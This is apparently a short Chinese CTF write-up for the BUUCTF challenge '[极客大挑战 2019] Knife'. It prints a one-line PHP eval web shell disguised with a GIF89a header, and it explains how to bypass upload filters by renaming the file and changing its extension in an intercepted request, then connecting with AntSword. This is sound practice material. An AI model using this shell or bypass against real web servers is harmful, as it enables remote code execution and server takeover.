[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)

[极客大挑战 2019]Knife------3.20BUUCTF练习day4(2)

解题内容

在一个文件中输入以下内容,该文件是phtml文件(HTML嵌套PHP代码,可以绕过很多限制)但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等

php 复制代码
GIF89a
<script language='php'>@eval($_POST[shell]);</script>



蚁剑连接

看了别人的wp,发现还可以删除前端校验函数,直接传phtml文件也可以


拓展

在上传的文件代码中含有GIF89a,这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验

PHP getimagesize(服务器端验证)

读取文件头信息,不是解析整个图片,所以效率较高

相关推荐
Q_Q5110082855 小时前
python+django/flask+uniapp基于微信小程序的瑜伽体验课预约系统
spring boot·python·django·flask·uni-app·node.js·php
2503_924806855 小时前
动态IP使用中 报错407 怎么办???
服务器·tcp/ip·php
纷飞的花火丶8 小时前
Oracle数据库注入基础入门
网络安全·oracle·sql注入
该用户已不存在8 小时前
PHP、Python、Node.js,谁能称霸2025?
python·node.js·php
Q_Q51100828512 小时前
python+nodejs+springboot在线车辆租赁信息管理信息可视化系统
spring boot·python·信息可视化·django·flask·node.js·php
_Re.13 小时前
DSC 归档配置相关
数据库·oracle·php
jun~13 小时前
SQLMap绕过 Web 应用程序保护靶机(打靶记录)
linux·笔记·学习·安全·web安全
上海云盾商务经理杨杨14 小时前
2025年电商小程序小量DDoS攻击防护指南:从小流量到大威胁的全面防护方案
网络安全·小程序·ddos
爱隐身的官人15 小时前
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
python·web安全·weblogic
BingoGo18 小时前
PHP 快速集成 ChatGPT 用 AI 让你的应用更聪明
后端·php